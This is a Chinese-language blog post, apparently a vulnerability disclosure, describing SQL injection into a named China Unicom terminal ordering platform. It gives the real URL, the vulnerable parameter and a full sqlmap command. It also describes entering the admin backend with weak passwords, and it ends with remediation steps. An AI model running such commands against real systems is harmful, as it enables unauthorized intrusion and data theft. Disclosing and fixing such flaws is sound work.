某联通终端订购平台被拿下全过程

信息安全 1245 Views
code 区域
北京联通终端订购平台http://dg.uninx.com/

SQLMap入侵某联通实例

1、注入点:

code 区域
http://dg.uninx.com/dgpt/list.php?searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian=

参数:inpguodaishang未过滤导致boolean-based blind&UNION query&AND/OR time-based blind注入2、SQLMAP测试过程测试语句:

code 区域
sqlmap.py -u "http://dg.uninx.com/dgpt/list.php?searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian=" -p inpguodaishang --current-db --current-user --level 3 --threads 3 --tamper between.py

这个表里面的username应该是员工号,密码全部为弱口令

联通用户674个3、管理员密码存在弱口令

里面9个用户,5个弱口令,其中三个一样。4、SA权限,有部分数据库用户密码较简单

5、弱密码进入后台

里面有很多数据,其中包括敏感数据,就不截图了,进来就退出了,请尽快修改弱密码!~~~而且已经内部通知修改弱口令,但是还是没有改掉哦,通知应该重视啊!~~~6、路径泄漏

漏洞证明:

修复方案:

1、过滤参数,防注入2、安全狗3、修改数据库权限以及弱密码4、修改管理员用户弱密码5、绝对路径的泄漏问题6、你们懂得~~~请尽快修改弱口令,弱口令啊!~~~

如未说明则本站原创,转载请注明出处:NULL » 某联通终端订购平台被拿下全过程